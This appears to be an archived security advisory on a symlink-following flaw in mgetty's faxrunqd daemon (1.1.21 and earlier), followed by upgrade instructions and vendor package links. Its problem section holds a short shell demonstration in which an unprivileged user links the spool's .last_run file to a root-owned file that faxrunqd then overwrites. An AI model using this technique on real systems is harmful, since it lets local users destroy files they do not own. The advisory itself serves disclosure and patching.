COMMAND

    mgetty

SYSTEMS AFFECTED

    mgetty 1.1.21 and prior (at least back to 1994)

PROBLEM

    Stan Bubrouski found following.   faxrunqd follows symbolic  links
    when creating certain files.   The default location for the  files
    is /var/spool/fax/outgoing, which  is a world-writable  directory.
    Local users  can destroy  the contents  of any  file on  a mounted
    filesystem because faxrunqd is usually run by root.

    mgetty comes with a program  named faxrunqd, which is a  daemon to
    send fax jobs queued  by faxspool(1).  Upon  successful execution,
    a file named .last_run is created in the  /var/spool/fax/outgoing/
    directory which is world-writable.   The problem lies in the  fact
    faxrunqd will follow symlinks  created by any user,  allowing file
    creation   anywhere   and   allowing   existing   files   to    be
    overwritten/destroyed.  Example:

        Remote unprivilaged user:
        [user@king /tmp]$ id
        uid=200(user) gid=100(users) groups=100(users)
        [user@king /tmp]$ ls -al /var/spool/fax/outgoing
        total 3
        drwxrwxrwt    3 root     root         1024 Jun  2 18:46 .
        drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..
        drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks
        [user@king /tmp]$ ls -al /etc/smash_me
        -rw-r--r--    1 root     root           12 Jun  2 18:45 /etc/smash_me
        [user@king /tmp]$ cat /etc/smash_me
        Smash me!!!
        [user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
        [user@king /tmp]$ ls -al /var/spool/fax/outgoing
        total 3
        drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .
        drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..
        lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run ->
        /etc/smash_me
        drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks

        Root console:
        [root@king /tmp]# faxrunqd -l ttyS0
        ...

        Remote unprivilaged user:
        [user@king /tmp]$ ls -al /var/spool/fax/outgoing
        total 3
        drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .
        drwxr-xr-x    4 root     root         1024 Jun  2 18:48 ..
        lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run ->
        /etc/smash_me
        drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks
        [user@king /tmp]$ ls -al /etc/smash_me
        -rw-r--r--    1 root     root           44 Jun  2 18:48 /etc/smash_me
        [user@king /tmp]$ cat /etc/smash_me
        Fri Jun  2 18:48:47 2000 /usr/sbin/faxrunqd
        [user@king /tmp]$

    Original report about this can be found at:

        http://oliver.efri.hr/~crv/security/bugs/Linux/various.html

SOLUTION

    First of all, this hole does NOT exist anymore in 1.1.22.  It  has
    been reported to  me by the  FreeBSD people, and  closed on August
    14, 2000.  1.1.22  has been released on  August 17, 2000, and  can
    be found on the usual places (http://alpha.greenie.net/mgetty/).

    If you  are using  the "sendfax"  part of  mgetty+sendfax AND  you
    have  possibly-malicious  users  on  your  system, then you should
    urgently upgrade  to 1.1.22  (which should  be a  matter of "make;
    make install").

    Looks like someone else realized this at least a couple weeks ago.

        $ make
        ===>  mgetty-1.1.21 is marked as broken: insecure tempfile handling:  can overwrite any file on the system.

    The OpenBSD cvs log shows:

        ----------------------------
        revision 1.17
        date: 2000/08/15 19:38:18;  author: brad;  state: Exp;  lines:  +2 -2
        even better reason why this should be marked BROKEN,
        insecure tempfile handling: can overwrite any file on the system
        ----------------------------

    For Caldera Systems:

      - OpenLinux Desktop 2.3
        ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/mgetty-1.1.22_Aug17-2OL.i386.rpm
        ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS/mgetty-1.1.22_Aug17-2OL.src.rpm

      - OpenLinux eServer 2.3 and OpenLinux eBuilder for ECential 3.0
        ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/mgetty-1.1.22_Aug17-2S.i386.rpm
        ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS/SRPMS/mgetty-1.1.22_Aug17-2S.src.rpm

      - OpenLinux eDesktop 2.4
        ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/mgetty-1.1.22_Aug17-2.i386.rpm
        ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS/mgetty-1.1.22_Aug17-2.src.rpm

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/mgetty-1.1.22-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-voice-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/mgetty-1.1.22-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-voice-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/mgetty-1.1.22-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-voice-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/mgetty-1.1.22-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-voice-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/mgetty-1.1.22-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-voice-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/mgetty-1.1.22-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-voice-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/mgetty-1.1.22-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-voice-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/mgetty-1.1.22-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-voice-1.1.22-1cl.i386.rpm

    For Linux-Mandrake:

        Linux-Mandrake 6.0: 6.0/RPMS/mgetty-1.1.22-2mdk.i586.rpm
                            6.0/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
                            6.0/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
                            6.0/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
                            6.0/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
                            6.0/SRPMS/mgetty-1.1.22-2mdk.src.rpm
        Linux-Mandrake 6.1: 6.1/RPMS/mgetty-1.1.22-2mdk.i586.rpm
                            6.1/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
                            6.1/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
                            6.1/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
                            6.1/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
                            6.1/SRPMS/mgetty-1.1.22-2mdk.src.rpm
        Linux-Mandrake 7.0: 7.0/RPMS/mgetty-1.1.22-2mdk.i586.rpm
                            7.0/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
                            7.0/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
                            7.0/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
                            7.0/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
                            7.0/SRPMS/mgetty-1.1.22-2mdk.src.rpm
        Linux-Mandrake 7.1: 7.1/RPMS/mgetty-1.1.22-2mdk.i586.rpm
                            7.1/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
                            7.1/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
                            7.1/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
                            7.1/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
                            7.1/SRPMS/mgetty-1.1.22-2mdk.src.rpm

    For RedHat:

        ftp://updates.redhat.com/5.2/sparc/mgetty-voice-1.1.22-1.5.x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/mgetty-viewfax-1.1.22-1.5.x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/mgetty-sendfax-1.1.22-1.5.x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/mgetty-1.1.22-1.5.x.sparc.rpm
        ftp://updates.redhat.com/5.2/alpha/mgetty-voice-1.1.22-1.5.x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/mgetty-viewfax-1.1.22-1.5.x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/mgetty-sendfax-1.1.22-1.5.x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/mgetty-1.1.22-1.5.x.alpha.rpm
        ftp://updates.redhat.com/5.2/i386/mgetty-voice-1.1.22-1.5.x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/mgetty-viewfax-1.1.22-1.5.x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/mgetty-sendfax-1.1.22-1.5.x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/mgetty-1.1.22-1.5.x.i386.rpm
        ftp://updates.redhat.com/5.2/SRPMS/mgetty-1.1.22-1.5.x.src.rpm
        ftp://updates.redhat.com/6.2/sparc/mgetty-voice-1.1.22-1.6.x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/mgetty-viewfax-1.1.22-1.6.x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/mgetty-sendfax-1.1.22-1.6.x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/mgetty-1.1.22-1.6.x.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/mgetty-voice-1.1.22-1.6.x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/mgetty-viewfax-1.1.22-1.6.x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/mgetty-sendfax-1.1.22-1.6.x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/mgetty-1.1.22-1.6.x.i386.rpm
        ftp://updates.redhat.com/6.2/alpha/mgetty-voice-1.1.22-1.6.x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/mgetty-viewfax-1.1.22-1.6.x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/mgetty-sendfax-1.1.22-1.6.x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/mgetty-1.1.22-1.6.x.alpha.rpm
        ftp://updates.redhat.com/6.2/SRPMS/mgetty-1.1.22-1.6.x.src.rpm

    For FreeBSD:

        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/comms/mgetty-1.1.22.8.17.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/comms/mgetty-1.1.22.8.17.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/comms/mgetty-1.1.22.8.17.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/comms/mgetty-1.1.22.8.17.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/comms/mgetty-1.1.22.8.17.tgz